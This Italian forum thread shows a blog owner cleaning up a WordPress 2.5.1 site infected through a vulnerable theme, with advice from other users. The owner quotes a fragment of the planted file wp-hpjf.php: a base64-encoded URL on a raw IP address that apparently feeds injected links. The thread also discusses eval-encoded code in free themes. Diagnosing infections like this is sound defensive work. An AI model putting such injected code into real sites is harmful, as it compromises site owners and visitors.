- Home
- Categorie
- Coding e Sistemistica
- WordPress
- Malware
-
Malware
Salve a tutti, gestisco questo blog : viaggi-turismo.net
Avast mi segnala un malware.
ho trovato il codice maligno. È un iframe che compare dopo </html>. Ma non sono riuscito ad eliminarlo... suggerimenti?
-
Ciao extrabyte,
prova ad aprire il file footer.php, se non erro la chiusura dell'<html> dovrebbe trovarsi lì.Fammi sapere.
-
Avevo già provato. Non c'è traccia dell'iframe, quindi è nascosto.
-
Reistalla Wordpress poi se hai un backup precedente del template rinstalla pure quello...
-
E se facendo il ripristino del db me ritrovo di nuovo il malware?
Nella webroot ho trovato wp-hpjf.php che contiene un costrutto if
if ($alt_xred) { $xred=trim($alt_xred); $xred="http ://$xred"; }
else { $xred=base64_decode('aHR0cDovLzk0LjE0Mi4xMzMuMTI3L2xpbmthdG9yX2NvbA=='); }ho provato a cancellare il file dalla webroot, ma il problema è rimasto...
p.s. purtroppo wp non è aggiornato, è fermo alla 2.5.1 (gestisco un network di blog e questo l'ho lasciato per ultimo, gli altri sono aggiornati)
-
Ciao extrabyte, scarica il tema e poi controlla tutti i <?php include con un cerca...
-
fatto. L'unico che ho trovato è in archives.php:
<?php include (TEMPLATEPATH . '/searchform.php'); ?>
ps. vorrei cancellare tutti i file nella webroot, conservando il database, per poi installare l'ultima versione di wordpress. È questa la procedura giusta? (mi è stato suggerito di esportare in xml se il db è infetto, ma la dimensione del file è troppo grande per poi essere importato, quindi devo trovare qualche programma che mi divide il file xml)
-
Ho visto che hai aggiornato all'ultima release, e mi sembra che adesso il codice sia pulito, almeno quella della home. Considera che se il db è infetto, nel xml ti ritrovi tutte le infezioni
Puoi sempre correggere il file a mano visto che solitamente le infezioni sono in qualche riga della tabella wp_options, o almeno è qui che ho riscontrato anomalie nella maggior parte dei casi...
-
@cardy said:
Ho visto che hai aggiornato all'ultima release, e mi sembra che adesso il codice sia pulito, almeno quella della home. Considera che se il db è infetto, nel xml ti ritrovi tutte le infezioni
si, ho aggiornato WP e ora è tutto ok...
@cardy said:
Puoi sempre correggere il file a mano visto che solitamente le infezioni sono in qualche riga della tabella wp_options, o almeno è qui che ho riscontrato anomalie nella maggior parte dei casi...
fortunatamente il db non è infetto. Una domanda: come è avvenuta l'infezione? freezando l'account ftp?
-
Code injection attraverso un tema vulnerabile...Il tema permetteva probabilmente l'esecuzione di codice... ho trovato un php_eval che sostanzialmente tramite fwrite modificava il contenuto di un file del tema.
-
quindi pur avendo eseguito l'aggiornamento di WP all'ultima versione, il pericolo c'è ancora?
ps. È possibile configurare .htaccess in modo da evitare simili attacchi?
-
Un'altra cosa.
Ho scoperto l'infezione grazie ad avast. Esiste qualche servizio online che scansiona le pagine web in modo da controllare codice malevolo?
-
blog nuovamente bucato. Questa volta non è un malware: nel sorgente html appare nel footer un link che punta verso un servizio di hosting.
-
Non so se tu abbia subito un attacco ma a me successe una cosa simile quando scaricai un tema gratuito ma che aveva la suo interno un codice base64_decode nel function.php mi pare di ricordare che mi faceva apparire alcuni link ad hosting nel footer. Giustamente chi aveva fatto quel tema voleva avere i suoi crediti a fare un po di soldi. Per eliminarlo definitivamente ho decriptato il codice e tolto i link, se non ci riesci poi mettere in **display: none **quel link
-
nel css alla classe .Footer p tanto non c'è scritto nient'altro
-
la cosa strana è che quel tema lo uso da un bel pò di tempo. Nel footer c'era il codice js di shinystat...
-
ho scaricato nuovamente tema e ho visto che il footer.php contiene:
<?php echo FOOTER; ?>
</body>
</html>e quindi mi appare la scritta FOOTER
-
Ho scaricato un tema qualsiasi da freewptheme.net dove non ho trovato il tuo tema e nel footer c'era appunto il codice criptato eval. Attenzione che questo file è una porta aperta al tuo sito dai costruttori del tema. Non so dove l'hai scaricato anche se il tuo file css dice che l'autore è appunto freewptheme.net. Se trovi quel file lo devi decriptare ed eliminare il superfluo. Su google ci sono molte guide su come farlo anche se non è semplice.